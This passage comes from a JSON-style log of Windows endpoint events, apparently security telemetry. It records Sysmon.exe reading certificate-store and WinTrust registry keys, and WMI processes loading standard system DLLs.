"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "ktmw32.dll", - "image_path": "C:\\Windows\\System32\\ktmw32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "resutils.dll", - "image_path": "C:\\Windows\\System32\\resutils.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "resutils.dll", - "image_path": "C:\\Windows\\System32\\resutils.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "wbemcomn.dll", - "image_path": "C:\\Windows\\System32\\wbemcomn.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", - "registry_value": "CIMOM", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", - "registry_value": "CIMOM", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 